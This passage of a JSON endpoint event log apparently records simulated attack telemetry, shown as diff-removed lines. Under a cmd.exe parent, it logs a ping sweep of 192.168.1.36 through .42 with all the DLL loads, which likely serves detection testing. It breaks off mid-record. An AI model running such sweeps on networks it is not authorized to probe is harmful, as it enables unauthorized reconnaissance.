"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572157140000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "event_type": "process", - "pid": 2504, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572161830000, - "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.36", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572161980000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "event_type": "process", - 
"pid": 4592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572166990000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.37", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572167150000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - 
"unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572167140000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "event_type": "process", - "pid": 3036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572171830000, - "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.38", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": 
"{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572171980000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "event_type": "process", - "pid": 5532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572176990000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.39", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5512, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177140000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572177300000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "event_type": "process", - "pid": 5512, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572181990000, - "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.40", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572182450016, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.41", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8060, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572182680000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8060, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182770000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182770000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "process", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572186840000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.42", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - 
"timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": 